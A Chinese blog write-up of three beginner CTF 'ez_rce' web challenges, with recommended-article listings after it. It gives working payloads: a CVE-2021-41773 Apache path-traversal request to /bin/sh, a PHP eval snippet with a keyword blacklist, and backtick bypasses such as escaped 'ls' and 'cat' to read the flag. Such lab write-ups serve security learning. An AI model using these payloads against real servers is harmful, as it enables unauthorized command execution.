[SWPUCTF 2022 新生赛]ez_rce、[NSSRound#4 SWPU]ez_rce、[UUCTF 2022 新生赛]ez_rce

已于 2022-11-09 09:41:58 修改
阅读量3.9k 收藏 4
点赞数 5
文章标签: 安全 web安全
于 2022-11-07 21:55:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46497491/article/details/127739945
版权

第一题:[SWPUCTF 2022 新生赛]ez_rce已解决

 1、看一下,啥也没有,找一下robots.txt

2、访问一下,/NSS/index.php

3、thinkphp,直接找个工具嗦吧,咱也不会

4、粘过来直接用,后面写命令,这题很烦,我在/flag找了半天,没找到

 5、后来发现了nss,又套娃,整的我这个菜鸡都怀疑人生了,太菜了!

第二题:[NSSRound#4 SWPU]ez_rce

题目标签:CVE-2021-41773,版本漏洞

大佬详细解释:CVE-2021-41773(42013) Apache HTTP Server路径穿越漏洞复现_wavesky111的博客-CSDN博客_cve-2021-41773

/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

burp中再写入命令,在flag_is_here中藏的很深,所以过滤一下

grep -r "NSS"  /flag_is_here
以递归的方式查找“/flag_is_here”下包含“NSS”的文件

grep详细用法:Linux grep 命令 | 菜鸟教程

第三题、[UUCTF 2022 新生赛]ez_rce

居然都不输入参数,可恶!!!!!!!!!

<?php
## 放弃把,小伙子,你真的不会RCE,何必在此纠结呢????????????
if(isset($_GET['code'])){
    $code=$_GET['code'];
    if (!preg_match('/sys|pas|read|file|ls|cat|tac|head|tail|more|less|php|base|echo|cp|\$|\*|\+|\^|scan|\.|local|current|chr|crypt|show_source|high|readgzfile|dirname|time|next|all|hex2bin|im|shell/i',$code)){
        echo '看看你输入的参数!!!不叫样子!!';echo '<br>';
        eval($code);
    }
    else{
        die("你想干什么?????????");
    }
}
else{
    echo "居然都不输入参数,可恶!!!!!!!!!";
    show_source(__FILE__);
}

过滤了很多命令函数,没有过滤反引号

?code=printf(`l\s /`);

再查看flag就可以了

?code=printf(`c\at /fffffffffflagafag`);

 

 

L_ergo
关注
  • 5
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
[SWPUCTF 2022 新生]ez_rce
m0_73612768的博客
01-16 931
目录爆破;robots.txt;ThinkPHP RCE
[UUCTF 2022 新生]websign(查看网页源代码方法大全)
最新发布
2401_84499442的博客
07-07 215
第六种:将网页另存为.html文件,然后用文本编辑器打开。这一题主要是总结了查看网页源代码的方法。第二种:鼠标右键→查看网页源代码。第三种:ctrl+shift+I。只能用其他的方法,我这里用的是五。这一题ban掉了二 一 四。第四种:ctrl+U。
无参数读文件和RCE总结
kuzemax的博客
07-18 879
什么是无参数?顾名思义,就是只使用函数,且函数不能带有参数,这里有种种限制:比如我们选择的函数必须能接受其括号内函数的返回值;
[NSSRound#4 SWPU]ez_rce
m0_73121489的博客
04-28 524
标签说是CVE-2021-41773(Apache HTTP Server路径穿越漏洞)这里直接cat /flag_is here 是什么都没有的。我一个个试了一遍,在run.sh里面找到了flag的真正位置。dirsearch扫目录也没有扫什么有用的出来。
[UUCTF 2022 新生]ez_rce
m0_73612768的博客
01-03 1119
反引号命令执行;shell 绕过关键字过滤;
SWPUCTF 2022新生 web部分wp
weixin_44770698的博客
01-16 3963
SWPUCTF 2022新生
RCE.rar_coulomb matlab_rce_拓扑势_概率神经网络
09-23
在IT领域,特别是机器学习和神经网络模型设计中,“RCE.rar_coulomb matlab_rce_拓扑势_概率神经网络”这个标题所涵盖的知识点非常丰富。首先,我们要了解RCE网络,全称为“衰减库仑势”(Radiation-charge exchange...
RCE.zip_RCE网络_rce_rce分类器
07-14
基于模式识别的RCE网络算法分类器(衰减库仑势法)。利用概率密度进行分类
phpstudy_rce.py
10-11
phpstudy_rce
cve_2019_0708_bluekeep_rce.rb
09-07
2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。...
cve_2019_0708_bluekeep_rce:蓝皮漏洞利用
04-29
cve_2019_0708_bluekeep_rce.rb 添加 /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb rdp.rb 替换 /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb ...
[NSSRound#4] 复现
qq_61768489的博客
08-12 1199
可以看到下面的句子跟原棋盘数量一样,也就是我们要给原棋盘涂色,玩完之后能组成下面的句子并且颜色相符。是无法被正常解析的,所以需要修改签名,让他变成一个正常的phar文件还需要对phar文件进行修改。文件的签名是第一次生成文件的时候自动生成的,所以当我们修改数据过后,由于签名错误,这个。将文件压缩为zip文件,并把后缀改为png文件,这样文件内容和后缀白名单检测都绕过了。这里对文件后后缀进行了白名单,也对phar文件内容进行了检测,伪了绕过这两点。zip打不开,是把zip文件头换成rar了,换回去。.....
纳新复wp
qq_74655174的博客
02-22 257
纳新复wp
2022UUCTF-web
bossDDYY的博客
11-03 1995
我们先输入手机号和验证码试试,发现无论请求多少次 hint永远是895547922,结合mt_srand和mt_rand函数 当设置的种子确定(此处的种子时输入的手机号)时,每次的mt_rand都是固定的 我们可以猜测hint就是mt_rand的第一次,而目的验证码就是mt_rand的第二次。而且我们笃定是有上传的网页的,限制了文件类型 我们想要上传的是so,但是LD_PRELOAD也能解析jpg后缀 所以修改后缀上传就可以。sub的值是当前时间的最后一位,也就是保证当前的时间为xxxxxxxx1即可。
[UUCTF 2022 新生]ez_rce(1),2024年大厂网络安全面经
m0_61549953的博客
04-06 889
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
NSSCTF-Web题目7(ThinkPHP V5 框架漏洞)
weixin_54055099的博客
06-07 1234
NSSCTF部分题目
2022 UUCTF Web
weixin_63231007的博客
12-19 2397
2022UUCTF web部分题分析
攻防世界php_rce
08-26
攻防世界中的php_rce是指一种利用PHP解释器的远程代码执行漏洞进行攻击和防御的技术。这种漏洞可以允许攻击者将恶意的PHP代码注入到服务器上,并执行任意命令。引用中的payload是构造了一个用于执行"ls /flag"命令的payload,而引用中的payload则是用于执行"cat /flag"命令的。这些payload利用了PHP解释器中的函数调用漏洞,通过构造特定的函数调用参数来执行系统命令。所以,这些payload可以用于远程执行系统命令,如列出/flag目录下的文件或显示/flag文件的内容。请注意,这些payload仅用于演示和研究目的,并且在现实环境中使用它们是违法的。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [攻防世界-web篇(php_rce)详解](https://blog.csdn.net/qq_54803507/article/details/127041653)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值